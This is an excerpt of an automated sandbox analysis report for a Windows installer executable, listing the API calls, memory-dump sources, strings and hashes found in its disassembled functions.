                                                                                                                                                                                                                                    • Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                                                                                                                                                                                                    • Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406463,?,?), ref: 00406303
                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C
                                                                                                                                                                                                                                      • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                                                                                                                                                                                                      • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00406347
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,?,00426DE8,?,?,?,?,?), ref: 00406382
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00406391
                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406430
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437
                                                                                                                                                                                                                                      • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\2T10XBqS6g.exe,80000000,00000003), ref: 00406176
                                                                                                                                                                                                                                      • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                    • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                                                                                                                                                                                                    • API String ID: 2171350718-2529913679
                                                                                                                                                                                                                                    • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                                                                                                                                                                                                    • Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                    • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                    • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                                                                                                                                                                                                    • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\2T10XBqS6g.exe",75C53420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,?,0000000A,?), ref: 00406993
                                                                                                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 004069A2
                                                                                                                                                                                                                                    • CharNextW.USER32(?,"C:\Users\user\Desktop\2T10XBqS6g.exe",75C53420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,?,0000000A,?), ref: 004069A7
                                                                                                                                                                                                                                    • CharPrevW.USER32(?,?,75C53420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,?,0000000A,?), ref: 004069BA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • "C:\Users\user\Desktop\2T10XBqS6g.exe", xrefs: 00406974
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
                                                                                                                                                                                                                                    • *?|<>/":, xrefs: 00406982
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\2T10XBqS6g.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                    • API String ID: 589700163-4183469762
                                                                                                                                                                                                                                    • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                                                                                                                    • Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404685
                                                                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004046C3
                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004046CF
                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004046DB
                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004046EE
                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004046FE
                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404718
                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404722
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                                                                    • Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                                                                                                                    • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                                                                                                                                                                                                    • Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000), ref: 0040304E
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040306C
                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040309A
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 004030CC
                                                                                                                                                                                                                                      • Part of subcall function 00403017: MulDiv.KERNEL32(00000000,?,00000BF4), ref: 0040302C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                                                    • String ID: ... %d%%
                                                                                                                                                                                                                                    • API String ID: 722711167-2449383134
                                                                                                                                                                                                                                    • Opcode ID: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                                                                                                                                                                                                    • Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
                                                                                                                                                                                                                                    • GetMessagePos.USER32 ref: 00404FDF
                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404FF9
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                                                                    • Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00402FEA
                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402FFA
                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                                                    • API String ID: 1451636040-1158693248
                                                                                                                                                                                                                                    • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                                                                                                                                                                                                    • Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 702512BB: GlobalAlloc.KERNELBASE(?,?,702512DB,?,7025137F,00000019,702511CA,-000000A0), ref: 702512C5
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 70252743
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70252778
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29621683909.0000000070251000.00000020.00000001.01000000.00000005.sdmp, Offset: 70250000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621638856.0000000070250000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621730229.0000000070254000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621783107.0000000070256000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_70250000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$Free$Alloc
